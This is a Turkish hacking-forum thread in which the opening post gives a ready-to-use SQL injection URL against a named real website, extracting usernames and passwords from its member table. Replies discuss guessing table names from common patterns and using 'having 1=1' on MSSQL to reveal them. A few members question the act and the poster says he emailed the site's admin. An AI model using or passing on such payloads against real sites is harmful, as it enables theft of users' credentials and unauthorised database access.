folder Tahribat.com Forumları
linefolder Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
linefolder Www.Dergibi.Com - Sql İnjection (Username,Password)



Www.Dergibi.Com - Sql İnjection (Username,Password)

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Holyzone
    Holyzone's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 13/Ekim/2008
    Erkek

    http://www.dergibi.com/haber/ayrinti.asp?id=1 union select 0,1,username,3,4,password,6 from uyeler

     

  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    unix
    Andrei
    Andrei's avatar
    Banlanmış Üye
    Kayıt Tarihi: 11/Aralık/2008
    Erkek
    cıx cıx cıx, siddetle kınıyorum :P

    %40 indirimli olarak "Centos Sistem ve Sunucu Yönetimi" adlı kitabımızı satın alarak, Linux üzerine yapılacak olan devam projeleri icin destekte bulunabilirsiniz : http://www.hepsiburada.com/centos-sistem-ve-sunucu-yonetimi-oku-izle-dinle-ogren-p-KKODLAB01579
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Holyzone
    Holyzone's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 13/Ekim/2008
    Erkek
    :D
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Allura
    Allura's avatar
    Kayıt Tarihi: 17/Mayıs/2009
    Erkek

    helal olsun güzel iş.

    devamını diliyorum. indexte basabilirsin ya alttan alma helal.


    "
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Swool
    Swool's avatar
    Kayıt Tarihi: 11/Kasım/2007
    Erkek

    Takip ettiğim bir siteydi, güzel makaleler ve öyküler var.

    ''Helal Olsun'' luk birşey yok, gereksiz bir eylem.

  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Holyzone
    Holyzone's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 13/Ekim/2008
    Erkek

    Swool bunu yazdı:
    -----------------------------

    Takip ettiğim bir siteydi, güzel makaleler ve öyküler var.

    ''Helal Olsun'' luk birşey yok, gereksiz bir eylem.


    -----------------------------

     

    bir eylem yokki admine düzeltmesi için email bile gönderdim

    eyleme girmek istesem indeks atarım :P 

  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Swool
    Swool's avatar
    Kayıt Tarihi: 11/Kasım/2007
    Erkek
    Site yöneticisine e-posta gönderip burada konu açmak pasif bir eylem mi?
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    hotboy
    hotboy's avatar
    Kayıt Tarihi: 08/Ağustos/2005
    Erkek
    şimdi merak ettiğim birşey var. sql injection olduğunu anladık diyelim. select 0,1,username,3,4,password,6 from uyeler burda tablo adlarını nasıl öğreniyoruz? sallayarak uyeler diye tablo olduğunu öğrenemeyiz galiba, üstüne tablodaki field ları yazmışsın, onları nerden öğrendin? yöntem nedir?
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    unix
    Andrei
    Andrei's avatar
    Banlanmış Üye
    Kayıt Tarihi: 11/Aralık/2008
    Erkek

    hotboy bunu yazdı:
    -----------------------------
    şimdi merak ettiğim birşey var. sql injection olduğunu anladık diyelim. select 0,1,username,3,4,password,6 from uyeler burda tablo adlarını nasıl öğreniyoruz? sallayarak uyeler diye tablo olduğunu öğrenemeyiz galiba, üstüne tablodaki field ları yazmışsın, onları nerden öğrendin? yöntem nedir?
    -----------------------------

    sorunu yanlıs anlamamısımdır umarım.

    tablo adları belirlidir zaten. Misal admin tbl_user tbl_admin user users admins vs gibi...

    Url'den de kendini belli eder bazen, söyle ki siteadi.com/uyeler.asp?id=50' select null,null,name,pw,null uyeler/user/users seklinde cıkabilir...


    %40 indirimli olarak "Centos Sistem ve Sunucu Yönetimi" adlı kitabımızı satın alarak, Linux üzerine yapılacak olan devam projeleri icin destekte bulunabilirsiniz : http://www.hepsiburada.com/centos-sistem-ve-sunucu-yonetimi-oku-izle-dinle-ogren-p-KKODLAB01579
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    hotboy
    hotboy's avatar
    Kayıt Tarihi: 08/Ağustos/2005
    Erkek

    Andrei bunu yazdı:
    -----------------------------

    hotboy bunu yazdı:
    -----------------------------
    şimdi merak ettiğim birşey var. sql injection olduğunu anladık diyelim. select 0,1,username,3,4,password,6 from uyeler burda tablo adlarını nasıl öğreniyoruz? sallayarak uyeler diye tablo olduğunu öğrenemeyiz galiba, üstüne tablodaki field ları yazmışsın, onları nerden öğrendin? yöntem nedir?
    -----------------------------

    sorunu yanlıs anlamamısımdır umarım.

    tablo adları belirlidir zaten. Misal admin tbl_user tbl_admin user users admins vs gibi...

    Url'den de kendini belli eder bazen, söyle ki siteadi.com/uyeler.asp?id=50' select null,null,name,pw,null uyeler/user/users seklinde cıkabilir...


    -----------------------------

    olurmu hocam, adam icabında hfhgfshgfsh diye tablo açmış, url de bunu bildirmek zorunda değil, tablo adını öğrenmenin bi yolu varsa merak ettim.

  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fikret
    Fikret's avatar
    Kayıt Tarihi: 01/Ekim/2007
    Erkek

    hotboy bunu yazdı:
    -----------------------------

    Andrei bunu yazdı:
    -----------------------------

    hotboy bunu yazdı:
    -----------------------------
    şimdi merak ettiğim birşey var. sql injection olduğunu anladık diyelim. select 0,1,username,3,4,password,6 from uyeler burda tablo adlarını nasıl öğreniyoruz? sallayarak uyeler diye tablo olduğunu öğrenemeyiz galiba, üstüne tablodaki field ları yazmışsın, onları nerden öğrendin? yöntem nedir?
    -----------------------------

    sorunu yanlıs anlamamısımdır umarım.

    tablo adları belirlidir zaten. Misal admin tbl_user tbl_admin user users admins vs gibi...

    Url'den de kendini belli eder bazen, söyle ki siteadi.com/uyeler.asp?id=50' select null,null,name,pw,null uyeler/user/users seklinde cıkabilir...

    -----------------------------

    olurmu hocam, adam icabında hfhgfshgfsh diye tablo açmış, url de bunu bildirmek zorunda değil, tablo adını öğrenmenin bi yolu varsa merak ettim.

    -----------------------------

    mssql veritabanında having 1=1 kodunu calıstırıp tablo adını alabiliyorduk yanlıs hatırlamıyorsam ama tam emin değilim.

    sql injection konusunda detaylı makale var dökümanlar bölümünde bi kurcala hocam :) 


    screw you guys! i"m goin" hoooome!
Toplam Hit: 3859 Toplam Mesaj: 13